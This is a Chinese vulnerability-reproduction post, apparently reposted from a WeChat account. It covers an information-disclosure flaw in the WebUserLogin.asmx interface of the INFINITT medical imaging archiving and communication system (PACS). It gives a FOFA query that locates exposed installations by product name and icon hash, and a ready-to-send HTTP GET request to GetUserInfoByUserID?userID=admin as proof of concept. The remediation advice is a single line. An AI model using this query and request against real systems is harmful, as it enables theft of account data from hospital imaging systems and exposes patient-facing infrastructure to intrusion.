1. 英飞达医学影像存档与通信系统简介
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发
英飞达医学影像存档与通信系统
2.漏洞描述
英飞达医学影像存档与通信系统主要用于医疗图像的采集、存储、浏览、传输和输出。英飞达医学影像存档与通信系统WebUserLogin.asmx接口存在信息泄露漏洞。
CVE编号:
CNNVD编号:
CNVD编号:
3.影响版本
英飞达医学影像存档与通信系统
4.fofa查询语句
"INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
5.漏洞复现
漏洞链接:http://xx.xx.xx.xxx/webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin
漏洞数据包:
GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1
Host: xx.xx.xx.xx
User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept:*/*
Connection: Keep-Alive
7.整改意见
请联系厂商打补丁 https://www.infinitt.vip/icnweb/
原文始发于微信公众号(南风漏洞复现文库):英飞达医学影像存档与通信系统WebUserLogin.asmx接口存在信息泄露漏洞 附POC
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论